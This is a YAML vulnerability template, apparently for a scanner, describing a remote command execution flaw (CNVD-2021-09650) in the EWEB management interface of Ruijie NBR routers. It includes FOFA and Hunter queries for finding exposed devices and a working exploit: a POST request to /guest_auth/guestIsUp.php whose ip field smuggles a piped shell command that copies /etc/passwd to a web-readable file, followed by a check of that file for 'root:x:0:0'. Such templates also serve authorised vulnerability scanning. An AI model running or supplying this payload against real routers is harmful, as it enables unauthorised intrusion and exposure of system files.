product: 锐捷NBR路由器
vName: 锐捷NBR路由器 EWEB网管系统 远程命令执行
type: 命令执行
vID:
  - CNVD-2021-09650
level: 3
vDesc: 锐捷NBR路由器 EWEB网关系统部分接口存在命令注入，导致远程命令执行获取
version: ''
note: ''
search:
  FOFA: title="锐捷网络 --NBR路由器" && app="Ruijie-NBR路由器"
  Hunter: web.title=="锐捷网络--登录页面"
protocol: http
link: https://mp.weixin.qq.com/s/OOiLQxrpgssCJyneSmPQlw
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /guest_auth/guestIsUp.php
      data: mac=1&ip=127.0.0.1|cat /etc/passwd > 52e039302a62d077.txt
    verify:
      path: /guest_auth/52e039302a62d077.txt
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0:0'
            logic: and